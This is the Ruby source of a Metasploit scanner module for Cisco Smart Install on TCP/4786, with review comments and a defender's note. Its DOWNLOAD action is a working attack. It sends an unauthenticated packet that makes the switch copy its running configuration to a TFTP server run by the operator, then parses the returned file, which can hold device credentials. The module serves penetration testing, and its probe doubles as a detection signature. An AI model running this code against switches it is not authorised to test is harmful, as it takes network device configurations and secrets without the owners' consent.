Path: blob/master/modules/auxiliary/scanner/misc/cisco_smart_install.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary scanner for the Cisco Smart Install (SMI) service.
#
# Two actions are registered below: SCAN (the default) connects to RPORT and
# checks whether the peer answers the SMI probe with the expected signature;
# DOWNLOAD additionally asks the device to copy the configuration named by
# CONFIG to a TFTP server started by this module.  Every positive result is
# recorded through report_service/report_vuln.
#
# Defender's note: the fixed probe/response pair in SMI_PROBE and SMI_RE is a
# usable network signature for spotting this kind of enumeration on TCP/4786,
# and the referenced Cisco PSIRT advisory describes how to mitigate exposure
# of the feature.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Cisco
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  # Registers module metadata, the two actions and the datastore options.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Identify Cisco Smart Install endpoints',
        'Description' => %q(
          This module attempts to connect to the specified Cisco Smart Install port
          and determines if it speaks the Smart Install Protocol. Exposure of SMI
          to untrusted networks can allow complete compromise of the switch.
        ),
        'Author' => ['Jon Hart <jon_hart[at]rapid7.com>', 'Mumbai'],
        'References' =>
          [
            ['URL', 'https://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html'],
            ['URL', 'https://blogs.cisco.com/security/cisco-psirt-mitigating-and-detecting-potential-abuse-of-cisco-smart-install-feature'],
            ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170214-smi'],
            ['URL', 'https://github.com/Cisco-Talos/smi_check'],
            ['URL', 'https://github.com/frostbits-security/SIET']

          ],
        'License' => MSF_LICENSE,
        'DefaultAction' => 'SCAN',
        'Actions' => [
          ['SCAN', 'Description' => 'Scan for instances communicating via Smart Install Protocol (default)'],
          ['DOWNLOAD', 'Description' => 'Retrieve configuration via Smart Install Protocol']
        ],
      )
    )

    register_options(
      [
        # 4786/tcp is the Smart Install director port
        Opt::RPORT(4786),
        # Address the target should send TFTP traffic back to (DOWNLOAD only);
        # when unset, run_host falls back to Rex::Socket.source_address(ip)
        OptAddressLocal.new('LHOST', [ false, "The IP address of the system running this module" ]),
        OptInt.new('SLEEP', [ true, "Time to wait for config to come back", 10]),
        # User-controlled string that is interpolated into the copy command in
        # request_config; see the length caveat there
        OptString.new('CONFIG', [ true, "The source config to copy when using DOWNLOAD", "system:running-config" ])
      ]
    )
  end

  # thanks to https://github.com/Cisco-Talos/smi_check/blob/master/smi_check.py#L52-L53
  # Fixed 24-byte probe written to the socket by smi?; the expected reply is
  # described by SMI_RE.  Both are constant, so they double as an IDS signature.
  SMI_PROBE = "\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00".freeze
  # NOTE(review): ^ and $ are line anchors in Ruby regexes, not string anchors;
  # \A and \z would pin the whole response instead of a single line of it.
  SMI_RE = /^\x00{3}\x04\x00{7}\x03\x00{3}\x08\x00{3}\x01\x00{4}$/
  # Sends SMI_PROBE over the already-connected +sock+ and reads one response.
  #
  # @return [true] when the response matches SMI_RE; in every other branch the
  #   method falls through and returns the value of vprint_status (presumably
  #   falsy -- run_host depends on that via `return unless smi?`)
  def smi?
    sock.puts(SMI_PROBE)
    response = sock.get_once(-1)
    if response
      if SMI_RE.match(response)
        print_good("Fingerprinted the Cisco Smart Install protocol")
        return true
      else
        vprint_status("No match for '#{response}'")
      end
    else
      vprint_status("No response")
    end
  end

  # Starts the TFTP server that receives the configuration during DOWNLOAD.
  #
  # The server binds port 69 on 0.0.0.0, i.e. every local interface, and hands
  # each completed transfer to process_incoming.  The current thread is
  # remembered so that cleanup only tears the server down once.
  def start_tftp
    print_status("Starting TFTP Server...")
    @tftp = Rex::Proto::TFTP::Server.new(69, '0.0.0.0', { 'Msf' => framework, 'MsfExploit' => self })
    @tftp.incoming_file_hook = Proc.new{|info| process_incoming(info) }
    @tftp.start
    # register the listener socket with the module so the framework can track it
    add_socket(@tftp.sock)
    @main_thread = ::Thread.current
  end

  # Framework hook run per scanner thread; only the thread that started the
  # TFTP server (see start_tftp) shuts it down.
  def cleanup
    # Cleanup is called once for every single thread
    if ::Thread.current == @main_thread
      # Wait 5 seconds for background transfers to complete
      print_status("Providing some time for transfers to complete...")
      sleep(5)

      if @tftp
        print_status("Shutting down the TFTP service...")
        # NOTE(review): the rescue modifier swallows every StandardError from
        # close, so a failed shutdown is never reported
        @tftp.close rescue nil
        @tftp = nil
      end
    end
  end

  #
  # Callback for incoming files
  #
  # @param info [Hash] transfer description from the TFTP server; this method
  #   reads info[:file][:name], info[:file][:data] and info[:from], and returns
  #   early if any of them is missing
  # @return [void]
  def process_incoming(info)
    return if not info[:file]
    name = info[:file][:name]
    data = info[:file][:data]
    from = info[:from]
    return if not (name && data && from)

    # Trim off IPv6 mapped IPv4 if necessary
    # presumably info[:from] is an [address, port] pair -- verify against the
    # TFTP server implementation
    from = from[0].dup
    from.gsub!('::ffff:', '')

    print_status("Incoming file from #{from} - #{name} (#{data.length} bytes)")
    # The received configuration may contain device credentials; the parsing
    # and storage is delegated to the Msf::Auxiliary::Cisco mixin (inferred
    # from the include above)
    cisco_ios_config_eater(from, rport, data)
  end

  # Converts a hex string into its raw byte string, two hex digits per byte.
  #
  # @param string [String] even-length hex string (a trailing odd digit is
  #   dropped by the /../ scan)
  # @return [String] packed bytes
  def decode_hex(string)
    string.scan(/../).map { |x| x.hex }.pack('c*')
  end

  # Builds and sends the SMI message that asks the device to copy +config+ to
  # +tftp_server+ under a random 8-character file name.
  #
  # The payload is a fixed header followed by the copy command padded with
  # zero bytes to 336 bytes, plus two further 336-byte zero blocks.
  #
  # NOTE(review): the padding is computed as 336 - copy_config.length, so a
  # CONFIG value long enough to push the command past 336 characters makes
  # `'00' * negative` raise ArgumentError instead of producing a packet.
  #
  # @param tftp_server [String] address the device should write to
  # @param config [String] source configuration name (datastore CONFIG)
  # @return [void]
  def request_config(tftp_server, config)
    copy_config = "copy #{config} tftp://#{tftp_server}/#{Rex::Text.rand_text_alpha(8)}"
    packet_header = '00000001000000010000000800000408000100140000000100000000fc99473786600000000303f4'
    packet = (decode_hex(packet_header) + copy_config + decode_hex(('00' * (336 - copy_config.length)))) + (decode_hex(('00' * (336)))) + (decode_hex(('00' * 336)))
    print_status("Attempting #{copy_config}")
    sock.put(packet)
  end

  # Scanner entry point, invoked once per target host.
  #
  # SCAN: connect and fingerprint.  DOWNLOAD: start the TFTP server, fingerprint,
  # reconnect (the device accepts no further packets on the first connection),
  # send the copy request and wait SLEEP seconds for the file to arrive.
  # Connection-level failures are reported at verbose level and abort the host
  # without recording anything; the socket is always closed by the ensure block.
  # A fingerprinted host is recorded as a service and as a vulnerability.
  #
  # @param ip [String] target address
  # @return [void]
  def run_host(ip)
    begin
      case
      when action.name == 'SCAN'
        connect
        return unless smi?
      when action.name == 'DOWNLOAD'
        start_tftp
        connect
        return unless smi?
        disconnect # cant send any additional packets, so closing
        connect
        tftp_server = datastore['LHOST'] || Rex::Socket.source_address(ip)
        request_config(tftp_server, datastore['CONFIG'])
        print_status("Waiting #{datastore['SLEEP']} seconds for configuration")
        Rex.sleep(datastore['SLEEP'])
      end
    rescue Rex::AddressInUse, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, \
      ::Errno::ETIMEDOUT, ::Timeout::Error, ::EOFError => e
      vprint_error("error while connecting and negotiating Cisco Smart Install: #{e}")
      return
    ensure
      disconnect
    end

    service = report_service(
      host: rhost,
      port: rport,
      proto: 'tcp',
      name: 'Smart Install'
    )

    report_vuln(
      host: rhost,
      service: service,
      name: name,
      info: "Fingerprinted the Cisco Smart Install Protocol",
      refs: references,
      exploited_at: Time.now.utc
    )
  end
end